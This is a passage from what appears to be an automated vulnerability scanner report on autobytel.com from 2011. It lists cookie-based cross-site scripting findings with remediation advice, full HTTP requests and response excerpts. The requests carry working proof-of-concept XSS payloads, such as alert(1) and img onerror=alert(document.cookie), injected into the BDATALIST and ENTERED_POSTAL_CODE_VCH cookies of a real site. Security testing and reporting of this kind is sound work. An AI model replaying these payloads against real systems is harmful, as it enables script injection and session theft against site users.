<h1 id="textSection1" style="COLOR: black; FONT: 13pt/15pt verdana">
The value 285f6a<img src=a onerror=alert(1)>f2e1e159d1b cannot be converted to a number.
</h1>
...[SNIP]...

4.2001. http://www.autobytel.com/a.cfml [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /a.cfml

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb310"%3balert(1)//8c4641eac9a was submitted in the BDATALIST cookie. This input was echoed as cb310";alert(1)//8c4641eac9a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /a.cfml HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4cb310"%3balert(1)//8c4641eac9a; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 404 Not Found
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 23454
Vary: Accept-Encoding
Expires: Mon, 24 Jan 2011 23:41:55 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:41:55 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:41:54 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!-- begin: fnc_getComputerName.cfm -->

<!-- end: fnc_getComputerName.cfm -->
<!-- ReferringSite: --> <!-- Referer: None --> <!--
This file creates a boxerjam cookie that expires
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4cb310";alert(1)//8c4641eac9a";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "480B4519-BD86-5942-EC224DB8
...[SNIP]...

4.2002. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /ask-our-mechanics/my-garage.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload a18bb"%3balert(1)//aa71a6423cd was submitted in the BDATALIST cookie. This input was echoed as a18bb";alert(1)//aa71a6423cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4a18bb"%3balert(1)//aa71a6423cd; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:50:35 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:50:35 GMT
Content-Length: 22188
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:50:34 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4a18bb";alert(1)//aa71a6423cd";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "485A80FB-CB51-EEF4-287DB74D
...[SNIP]...

4.2003. http://www.autobytel.com/ask-our-mechanics/my-garage.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /ask-our-mechanics/my-garage.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload c7759"%3balert(1)//b74a61ebf4 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as c7759";alert(1)//b74a61ebf4 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /ask-our-mechanics/my-garage.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=c7759"%3balert(1)//b74a61ebf4; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:51:57 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:51:57 GMT
Content-Length: 22187
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:51:57 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
s.prop6 = "";
           //s.prop7 = "|";
           
           //s.prop9 = "|Search Engine Optimization Project|13148";
           s.prop10 = "|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "c7759";alert(1)//b74a61ebf4||";
           
           s.prop14 = "my garage page|ask-our-mechanics : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "||||||Se
...[SNIP]...

4.2004. http://www.autobytel.com/auto-insurance-quotes.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8df78"%3balert(1)//5201a4e556e was submitted in the BDATALIST cookie. This input was echoed as 8df78";alert(1)//5201a4e556e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c48df78"%3balert(1)//5201a4e556e; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Content-Length: 33670
Expires: Mon, 24 Jan 2011 23:47:56 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:47:56 GMT
Connection: close
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:47:56 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:47:56 GMT;path=/
Set-Cookie: PV_CT=3;path=/


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c48df78";alert(1)//5201a4e556e";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "48427175-FA79-9560-9E7F5FF7
...[SNIP]...

4.2005. http://www.autobytel.com/auto-insurance-quotes.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /auto-insurance-quotes.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fcd74"%3balert(1)//973f381dc13 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as fcd74";alert(1)//973f381dc13 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /auto-insurance-quotes.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=fcd74"%3balert(1)//973f381dc13; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:54:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:54:15 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:54:14 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:54:14 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 33670


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
//s.prop7 = "finins|";
           
           //s.prop9 = "finins|Search Engine Optimization Project|13148";
           s.prop10 = "finins|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "fcd74";alert(1)//973f381dc13||";
           
           s.prop14 = "auto insurance quotes page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "finins||||sky|
...[SNIP]...

4.2006. http://www.autobytel.com/car-advice.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f42cf"%3balert(1)//2f1bdfd3bb8 was submitted in the BDATALIST cookie. This input was echoed as f42cf";alert(1)//2f1bdfd3bb8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4f42cf"%3balert(1)//2f1bdfd3bb8; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:31 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:31 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:49:31 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43784


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c4f42cf";alert(1)//2f1bdfd3bb8";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "4850C1E8-0F75-AD47-69BCECD4
...[SNIP]...

4.2007. http://www.autobytel.com/car-advice.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-advice.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 16d60"%3balert(1)//0c306d2f8a8 was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as 16d60";alert(1)//0c306d2f8a8 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-advice.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=16d60"%3balert(1)//0c306d2f8a8; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:55:02 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:55:02 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:55:02 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:55:02 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 43784


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "16d60";alert(1)//0c306d2f8a8||";
           
           s.prop14 = "car advice page : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|Searc
...[SNIP]...

4.2008. http://www.autobytel.com/car-blog.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-blog.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8d07d"%3balert(1)//c4d2bfc31c0 was submitted in the BDATALIST cookie. This input was echoed as 8d07d";alert(1)//c4d2bfc31c0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c48d07d"%3balert(1)//c4d2bfc31c0; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:49:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:49:47 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:49:45 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:49:45 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62071


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
<img src=a onerror=alert(document.cookie)>f067754e5c48d07d";alert(1)//c4d2bfc31c0";
           
           
           //Zane 2/11/10 - Recently Viewed
           
           
                       //Paul Koch 3/17/08 - add cpcID
           
       
           //Paul Koch 1/25/08 - add page request UUID
           s.prop40 = "485310ED-DBE7-D3F5-FA1DCEE4
...[SNIP]...

4.2009. http://www.autobytel.com/car-blog.htm [ENTERED_POSTAL_CODE_VCH cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-blog.htm

Issue detail

The value of the ENTERED_POSTAL_CODE_VCH cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload cb21a"%3balert(1)//f4f0cb5b4cd was submitted in the ENTERED_POSTAL_CODE_VCH cookie. This input was echoed as cb21a";alert(1)//f4f0cb5b4cd in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /car-blog.htm HTTP/1.1
Host: www.autobytel.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: TIME=%7Bts%20%272011%2D01%2D24%2017%3A06%3A34%27%7D; BDATALIST=Google%20Search%7Ef34b4%2D%2D%3E%3Cimg%20src%3Da%20onerror%3Dalert%28document%2Ecookie%29%3Ef067754e5c4; __utmz=47232823.1295903274.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/31; USER_UUID_VCH=427D3445%2DBFE0%2DBF1D%2D884FC154EC603416; Axxd=1; s_sq=%5B%5BB%5D%5D; PV_CT=2; cweb=JONQJVS10.4.128.176CKMMM; HOMEVERSION=2; AxData=; s_cc=true; COUNT=1; ID=13148%3BABTL; ENTERED_POSTAL_CODE_VCH=cb21a"%3balert(1)//f4f0cb5b4cd; s_vi=[CS]v1|269EF4F28501182F-60000108600B027D[CE]; __utma=47232823.1972730476.1295903274.1295903274.1295903274.1; __utmc=47232823; __utmb=47232823.1.10.1295903274;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=UTF-8
Server: Microsoft-IIS/7.0
Expires: Mon, 24 Jan 2011 23:56:01 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Mon, 24 Jan 2011 23:56:01 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: ENTERED_POSTAL_CODE_VCH=;expires=Wed, 16-Jan-2041 23:56:01 GMT;path=/
Set-Cookie: HOMEVERSION=2;path=/
Set-Cookie: QUICKPOLL=0%2C0%3B;expires=Wed, 16-Jan-2041 23:56:01 GMT;path=/
Set-Cookie: PV_CT=3;path=/
Content-Length: 62071


<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">


<!-- CWEB425 --><!-- www -->
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:og="http://opengraphprotocol.org/schema/" xmlns:fb
...[SNIP]...
op7 = "research|";
           
           //s.prop9 = "research|Search Engine Optimization Project|13148";
           s.prop10 = "research|";
           s.prop11 = "Search Engine Optimization Project|13148|ABTL";
           s.prop12 = "cb21a";alert(1)//f4f0cb5b4cd||";
           
           s.prop14 = "research|blog : Search Engine Optimization Project entry page";
           s.prop15 = "|No Article";
           s.prop16 = "";
           s.prop17 = "";
           s.prop20 = "research||||sky|ban|Search
...[SNIP]...

4.2010. http://www.autobytel.com/car-dealers.htm [BDATALIST cookie]

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.autobytel.com
Path:   /car-dealers.htm

Issue detail

The value of the BDATALIST cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6acbb"%3balert(1)//cf6dd0ed469 was submitted in the BDATALIST cookie. This input was echoed as 6acbb";alert(1)//cf6dd0ed469 in the application's response.

